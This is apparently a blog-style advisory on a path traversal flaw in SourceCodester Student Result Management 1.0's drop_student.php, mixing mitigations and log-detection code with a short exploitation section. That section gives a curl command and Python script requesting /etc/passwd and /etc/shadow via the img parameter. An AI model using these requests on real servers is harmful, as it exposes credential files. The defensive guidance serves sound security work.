How CVE-2025-4720 Works
The vulnerability exists in `academic/core/drop_student.php` due to improper sanitization of the `img` parameter, allowing attackers to perform path traversal. By manipulating this parameter, an attacker can access arbitrary files outside the intended directory, potentially leading to sensitive data exposure or server compromise. The flaw arises from insufficient validation of user-supplied input before using it in filesystem operations. Remote exploitation is possible without authentication, making this a critical security risk.
DailyCVE Form
Platform: SourceCodester Student Result Management
Version: 1.0
Vulnerability: Path Traversal
Severity: Critical
Date: 05/27/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation Commands
curl -X GET "http://target.com/academic/core/drop_student.php?img=../../../../etc/passwd"
import requests

url = "http://target.com/academic/core/drop_student.php"
params = {"img": "../../../../etc/shadow"}
response = requests.get(url, params=params)
print(response.text)
Protection Measures
1. Input Validation:
$img = basename($_GET['img']);
2. Web Server Restrictions (open_basedir confines PHP file access to the document root; it does not stop traversal between directories inside it):
<Directory /var/www/html/academic/core>
    php_admin_value open_basedir "/var/www/html"
</Directory>
3. Patch Verification:
grep -r "basename" /var/www/html/academic/core/drop_student.php
Log Analysis
grep "drop_student.php" /var/log/apache2/access.log | grep -i -e '\.\./' -e '%2e%2e'
(In a regex an unescaped `.` matches any character, so a plain `"../"` pattern matches far more than traversal sequences; the escaped form above also catches the URL-encoded `%2e%2e` variant.)
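As an added example (not part of the original post), the following script does what the grep above does but more robustly: it parses Apache combined-format access log lines, isolates the `img` parameter of requests to `drop_student.php`, percent-decodes it repeatedly so encoded and double-encoded sequences are caught, and reports the client, status code and decoded value for each traversal attempt. The log lines are constructed samples and the script path and log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [27/May/2025:10:01:02 +0000] "GET /academic/core/drop_student.php?img=photo1.jpg HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [27/May/2025:10:01:07 +0000] "GET /academic/core/drop_student.php?img=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.0"
10.0.0.9 - - [27/May/2025:10:01:09 +0000] "GET /academic/core/drop_student.php?img=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "python-requests/2.31"
10.0.0.9 - - [27/May/2025:10:01:11 +0000] "GET /academic/core/drop_student.php?img=..%252f..%252fetc%252fpasswd HTTP/1.1" 404 210 "-" "python-requests/2.31"
10.0.0.7 - - [27/May/2025:10:02:00 +0000] "GET /academic/index.php?page=..%2f..%2fetc%2fpasswd HTTP/1.1" 403 0 "-" "curl/8.0"
"""

# Apache combined format: client IP, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A ".." path component delimited by a slash or backslash (or string start/end).
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded ..%252f is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal_hits(log_text, script="/academic/core/drop_student.php", param="img"):
    """Return (ip, status, decoded_img) for each request that sent a traversal sequence in `img`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        if parts.path != script:
            continue  # only the vulnerable endpoint is of interest here
        # parse_qs already decodes one level; fully_decode handles further layers.
        for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            decoded = fully_decode(raw)
            if TRAVERSAL_RE.search(decoded):
                hits.append((m.group("ip"), int(m.group("status")), decoded))
    return hits


if __name__ == "__main__":
    for ip, status, img in find_traversal_hits(SAMPLE_LOG):
        print(f"{ip} status={status} img={img}")  # a 200 means the file was likely served
```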
Mitigation Script
if (strpos($_GET['img'], '..') !== false) {
    die("Invalid file path!");
}
Debugging
error_log("Attempted path traversal: " . $_GET['img']);
Nginx Protection
location ~ ^/academic/core/drop_student\.php$ {
    if ($args ~* "\.\.|%2e%2e") { return 403; }
}
(The dots must be escaped: an unescaped `".."` matches any two characters and would reject almost every request with a query string. `$args` is not URL-decoded by nginx, so the encoded `%2e%2e` form is matched explicitly.)
Automated Scanning
nikto -h http://target.com -root /academic/core
Post-Exploitation Checks
find /var/www/html -type f -name '*.php' -exec grep -lF "\$_GET['img']" {} \;
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode